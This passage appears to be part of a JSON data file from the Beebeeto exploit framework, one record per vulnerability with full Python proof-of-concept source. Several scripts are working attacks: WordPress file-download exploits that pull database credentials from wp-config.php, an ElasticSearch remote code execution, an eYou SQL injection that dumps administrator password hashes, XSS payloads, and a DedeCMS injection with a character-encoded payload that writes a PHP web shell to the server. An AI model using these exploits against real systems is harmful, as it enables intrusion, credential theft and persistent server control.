...'.format(url=args['options']['target'])\r\n        req = urllib2.Request(vul_url, data)\r\n        response = urllib2.urlopen(req).read()\r\n        if 'DB_USER' in response and 'DB_PASSWORD' in response and 'WordPress' in response:\r\n            match_data1 = re.compile('\\'DB_USER\\'\\,(.*)\\)')\r\n            match_data2 = re.compile('\\'DB_PASSWORD\\'\\,(.*)\\)')\r\n            match_data3 = re.compile('\\'DB_HOST\\'\\,(.*)\\)')\r\n            data1 = match_data1.findall(response)\r\n            data2 = match_data2.findall(response)\r\n            data3 = match_data3.findall(response)\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = args['options']['target'] + '/wp-content/themes/persuasion/lib/scripts/dl-skin.php'\r\n            args['poc_ret']['DB_USER'] = data1[0]\r\n            args['poc_ret']['DB_PASSWORD'] = data2[0]\r\n            args['poc_ret']['DB_HOST'] = data3[0]\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d \uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002", "app_name": "WordPress", "id": "poc-2014-0029", "layer4_protocol": null}
+{"create_date": "2014-09-25 13:24:31", "name": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "ElasticSearch,remote code execution,java", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\ntry:\r\n    import simplejson as json\r\nexcept ImportError:\r\n    import json\r\nimport socket\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import ForgeHeaders\r\n\r\nsocket.setdefaulttimeout(5)\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0028',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'e3rp4y',  # \u4f5c\u8005\r\n            'create_date': '2014-09-25',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [9200],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ElasticSearch',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['<=1.2'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Code Execution',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['ElasticSearch', 'remote code execution', 'java'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': [\r\n                'http://www.ipuman.com/pm6/137/',\r\n                'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120',\r\n                'http://www.freebuf.com/tools/38025.html' # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def _emit(cls, args, exp):\r\n        data = {\r\n            'size': 1,\r\n            'query': {\r\n                'filtered': {\r\n                    'query': {\r\n                        'match_all': {}\r\n                    }\r\n                }\r\n            },\r\n            'script_fields': {\r\n                'task': {  # you can call the task any name, such as 'biubiubiu' etc.\r\n                    'script': exp\r\n                }\r\n            }\r\n        }\r\n        payload = json.dumps(data)\r\n        headers = ForgeHeaders().get_headers()\r\n        headers['Content-Type'] = 'application/json; charset=utf-8'\r\n        headers['Accept'] = 'ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\r\n        url = args['options']['target'] + '/_search?source'\r\n        req = urllib2.Request(url, data=payload, headers=headers)\r\n        resp = urllib2.urlopen(req)\r\n        if resp.getcode() != 200 or \\\r\n           'application/json' not in resp.headers.get('content-type'):\r\n            return None\r\n        else:\r\n            ret = json.loads(resp.read())\r\n            return ret['hits']['hits'][0]['fields']['task'][0]\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        rs = cls._emit(args, 'Integer.toHexString(65535)')\r\n        if rs == 'ffff':\r\n            url = args['options']['target'] + '/_search?source'\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = url\r\n            if args['options']['verbose']:\r\n                print '[*] {} is vulnerable'.format(args['options']['target'])\r\n        else:\r\n            if args['options']['verbose']:\r\n                print '[*] {} is not vulnerable'.format(args['options']['target'])\r\n            args['success'] = False\r\n\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.", "app_name": "ElasticSearch", "id": "poc-2014-0028", "layer4_protocol": null}
+{"create_date": "2014-09-24 19:54:25", "name": "SVN information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "Eth0n", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,svn", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0024',\r\n            'name': 'SVN information disclosure POC',\r\n            'author': 'Eth0n',\r\n            'create_date': '2014-09-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'All site svn configuration wrong',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['information disclosure', 'svn'],\r\n            'desc': 'use svn incorrect cause site information disclosure',\r\n            'references': ['http://drops.wooyun.org/tips/352',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        keyword = ['file','dir']\r\n        vul_url = args[\"options\"][\"target\"] + '/.svn/entries'\r\n        if args['options']['verbose']:\r\n            print \"[*] Request URL:\", vul_url\r\n        resquest = urllib2.Request(vul_url)\r\n        response = urllib2.urlopen(resquest)\r\n        if response.getcode() != 200:\r\n            args[\"success\"] = False\r\n            return args\r\n        content = response.read()\r\n        flag = False\r\n        for word in keyword:\r\n            if word in content:\r\n                flag = True\r\n                break\r\n        if flag == True:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = vul_url\r\n            return args\r\n        else:\r\n            args[\"success\"] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "use svn incorrect cause site information disclosure", "app_name": "SVN", "id": "poc-2014-0024", "layer4_protocol": null}
+{"create_date": "2014-09-23 23:48:11", "name": "WordPress Acento Theme Arbitrary File Download POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,/wp-content/themes/acento/includes/view-pdf.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0022',\r\n            'name': 'WordPress Acento Theme Arbitrary File Download POC',\r\n            'author': 'flsf',\r\n            'create_date': '2014-09-23',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': [''],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['WordPress', '/wp-content/themes/acento/includes/view-pdf.php', 'Arbitrary File Download'],\r\n            'desc': 'wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6',\r\n            'references': ['http://www.exploit-db.com/exploits/34578/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        if 'root:' in content and 'nobody:' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6", "app_name": "WordPress", "id": "poc-2014-0022", "layer4_protocol": null}
+{"create_date": "2014-09-23 17:13:43", "name": "eYou v5 /em/controller/action/help.class.php SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "eYou,sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport hashlib, base64\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0021',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'eYou v5 /em/controller/action/help.class.php SQL Injection POC',  # \u540d\u79f0\r\n            'author': 'root',  # \u4f5c\u8005\r\n            'create_date': '2014-09-23',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'eYou',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['v5'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['eYou!', 'sql injection'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'eYou v5 has sql injection in /.',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-058014',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload_v = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL#'\r\n        attack_url = args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + attack_url + payload_v\r\n        request = urllib2.Request(attack_url, payload_v)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        res= '5d975967029ada386ba2980a04b7720e'\r\n        if res in content:\r\n            args['success'] = True\r\n            args['poc_ret']['key'] = res\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        payload = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x2d2d2d,IFNULL' \\\r\n           '(CAST(admin_id AS CHAR),0x20),0x2d2d2d,IFNULL(CAST(admin_pass AS CHAR),0x20' \\\r\n           '),0x2d2d2d) FROM filter.admininfo LIMIT 0,1),NULL#'\r\n        match_data = re.compile('did=---(.*)---([\\w\\d]{32,32})---')\r\n        attack_url = args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + attack_url+ payload\r\n        request = urllib2.Request(attack_url, payload)\r\n        response = urllib2.urlopen(request).read()\r\n        data = match_data.findall(response)\r\n        if data:\r\n            args['success'] = True\r\n            args['poc_ret']['username'] = data[0][0]\r\n            args['poc_ret']['password'] = data[0][1]\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "eYou v5 has sql injection in /.", "app_name": "eYou", "id": "poc-2014-0021", "layer4_protocol": null}
+{"create_date": "2014-09-22 21:45:41", "name": "WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xidianlz", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,force-download.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n#coding:utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n    # poc\u76f8\u5173\u4fe1\u606f\r\n    'poc': {\r\n        'id': 'poc-2014-0017',\r\n        'name': 'WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC',\r\n        'author': 'xidianlz',\r\n        'create_date': '2014-09-22',\r\n        },\r\n    # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n    'protocol': {\r\n        'name': 'http',\r\n        'port': [80],\r\n        'layer4_protocol': ['tcp'],\r\n        },\r\n    # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n    'vul': {\r\n        'app_name': 'WordPress',\r\n        'vul_version': ['1.1'],\r\n        'type': 'Arbitrary File Download',\r\n        'tag': ['WordPress', 'force-download.php', 'Arbitrary File Download'],\r\n        'desc': 'WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e',\r\n        'references': ['http://sebug.net/vuldb/ssvid-87214',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/wp/wp-content/force-download.php?file=../wp-config.php\"\r\n        vul_url = args[\"options\"][\"target\"] + payload\r\n        if args['options']['verbose']:\r\n            print \"[*] Request URL:\", vul_url\r\n        resp = urllib2.urlopen(vul_url)\r\n        content = resp.read()\r\n        if (\"DB_PASSWORD\" in content ) and (\"DB_USER\" in content):\r\n            args[\"success\"] = True\r\n            args[\"poc_ret\"][\"vul_url\"] = vul_url\r\n            return args\r\n        else:\r\n            args[\"success\"] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "app_name": "WordPress", "id": "poc-2014-0017", "layer4_protocol": null}
+{"create_date": "2014-09-22 21:06:47", "name": "StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "hang333", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "StartBBS,Flash,XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"  \r\nSite: http://www.beebeeto.com/  \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework  \r\n\"\"\"  \r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0016',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'hang333',  # \u4f5c\u8005\r\n            'create_date': '2014-09-22',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'StartBBS',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['1.1.15.*'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'XSS',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['StartBBS', 'flash', 'xss'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-049457/trace/bbf81ebe07bcc6021c3438868ae51051',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n  }  \r\n\r\n    @classmethod  \r\n    def verify(cls, args):  \r\n        flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"  \r\n        file_path = \"/plugins/kindeditor/plugins/multiimage/images/swfupload.swf\"  \r\n        verify_url = args['options']['target'] + file_path  \r\n        xss_poc = '?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//'\r\n        if args['options']['verbose']:  \r\n            print '[*] Request URL: ' + verify_url  \r\n        request = urllib2.Request(verify_url)  \r\n        response = urllib2.urlopen(request)  \r\n        content = response.read()  \r\n        md5_value = md5.new(content).hexdigest()  \r\n        if md5_value in flash_md5: \r\n            args['success'] = True  \r\n            args['poc_ret']['xss_url'] = verify_url + xss_poc\r\n            return args  \r\n        else:  \r\n            args['success'] = False  \r\n            return args  \r\n  \r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS", "app_name": "Startbbs", "id": "poc-2014-0016", "layer4_protocol": null}
+{"create_date": "2014-09-22 17:44:47", "name": "Dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP", "level": "\u9ad8\u5371", "batchable": 1, "author": "HoerWing", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "dedecms,download.php&ad_js.php,SQL Inject,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python  \r\n# coding=utf-8  \r\n\r\n\"\"\" \r\nSite: http://www.beebeeto.com/ \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework \r\n\"\"\"\r\n\r\nimport urllib2  \r\n  \r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):  \r\n    poc_info = {  \r\n        # poc\u76f8\u5173\u4fe1\u606f  \r\n        'poc': {  \r\n            'id': 'poc-2014-0015',  \r\n            'name': 'dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP',  \r\n            'author': 'HoerWing',  \r\n            'create_date': '2014-09-22',  \r\n        },  \r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f  \r\n        'protocol': {  \r\n            'name': 'http',  \r\n            'port': [80],  \r\n            'layer4_protocol': ['tcp'],  \r\n        },  \r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f  \r\n        'vul': {  \r\n            'app_name': 'dedecms',  \r\n            'vul_version': ['5.7'],  \r\n            'type': 'SQL Inject',  \r\n            'tag': ['dedecms', 'download.php & ad_js.php', 'SQL Inject', 'GETSHELL'],  \r\n            'desc': 'ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539',  \r\n            'references': ['http://yxmhero1989.blog.163.com/blog/static/1121579562013581535738/',  \r\n            ],  \r\n        },  \r\n    }  \r\n \r\n    @classmethod  \r\n    def exploit(cls, args):  \r\n        payload1 = \"/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35\"  \r\n        payload2 = \"/plus/ad_js.php?aid=19\"\r\n        shell = \"/plus/moon.php\"\r\n        keyword = \"mOon\"\r\n        vul_url1 = args['options']['target'] + payload1 \r\n        vul_url2 = args['options']['target'] + payload2\r\n        shell_url = args['options']['target'] + shell\r\n        if args['options']['verbose']:  \r\n            print '[*] Request URL: ' + vul_url1\r\n            print '[*] Request URL: ' + vul_url2\r\n        request1 = urllib2.urlopen(vul_url1)\r\n        request2 = urllib2.urlopen(vul_url2)\r\n        resp = urllib2.urlopen(shell_url)  \r\n        content = resp.read() \r\n        if keyword in content:  \r\n            args['success'] = True  \r\n            args['poc_ret']['vul_url'] = vul_url2\r\n            args['poc_ret']['shell'] = shell_url\r\n            args['poc_ret']['password'] = 'x'\r\n            return args  \r\n        else:  \r\n            args['success'] = False  \r\n            return args  \r\n  \r\n    verify = exploit  \r\n  \r\nif __name__ == '__main__':  \r\n    from pprint import pprint  \r\n  \r\n    mp = MyPoc()  \r\n    pprint(mp.run())  ", "desc": "ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539", "app_name": "DedeCms", "id": "poc-2014-0015", "layer4_protocol": null}
+{"create_date": "2014-09-19 16:42:43", "name": "Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS,Discuz,post.php,Discuz7.2\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0009',\r\n            'name': 'Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-09-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['7.2'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Discuz!', 'post.php', 'Cross Site Scripting', 'XSS'],\r\n            'desc': 'post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f',\r\n            'references': 